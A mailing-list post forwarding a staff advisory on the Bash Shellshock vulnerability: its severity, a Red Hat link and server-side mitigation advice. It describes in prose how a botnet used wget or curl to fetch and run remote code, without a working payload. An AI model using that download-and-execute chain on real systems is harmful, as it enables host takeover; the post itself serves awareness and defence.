Genuine 10/10 nastiness for web-servers that use Bash CGI - you have all probably heard about this one - its potentially far far worse than the OpenSSL HeartBleed one... This is what I sent to all our staff yesterday:
*Introduction* Many of you will have read about this in the press. For those that haven’t, the simple summary is that the Bash shell that is used to execute CGI requests on most of the world’s web servers has had a huge and easily-exploitable hole in it for 20 years. As everyone uses the same version of the Unix toolchain, everyone uses the same “Bash” and thus all Unix-based are equally vulnerable. Its rated as being far worse in real terms than the “HeatBleed” SSL issue, in that rather than “just” being able to trawl the memory space of the remote web server for username/password combos or private RSA keys, you can basically do what you like - you can execute arbitrary command in the context of the remote shell – it’s really easy/trivial to exploit this bug – examples in the link below. RedHat have probably the most concise description of this issue – see [url]https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/[/url] Note that the fix that was originally posted was incomplete – a new fix is yet to be delivered. *How does this affect me?* Possibly a lot, in that sites that you access and which have your data stored on them may well be completely open to attack. If you run your own web sites (nearly all run some variant of Linux), you should replace your Bash as soon as an approved fix is available. However, there is nothing you, as a client browser, can do to lessen your chances of being indirectly affected by such an attack – its server-side only and therefore up to each Unix-based website that used Bash-based CGI scripting to implement the fixes ASAP, or to simply disable Bash CGI until the fix is made. This is being actively used in the wild already - a botnet was discovered within hours of the announcement - cunningly, it uses wget or curl do download the botnet precursor, does a chmod 777, ten executes the downloaded code to subvert the host and add it to the botnet. Nick -- You received this message because you are subscribed to the Google Groups "neonixie-l" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To post to this group, send an email to [email protected]. To view this discussion on the web, visit https://groups.google.com/d/msgid/neonixie-l/69ad51f5-3a4a-45de-bbb3-e09d05a36188%40googlegroups.com. For more options, visit https://groups.google.com/d/optout.
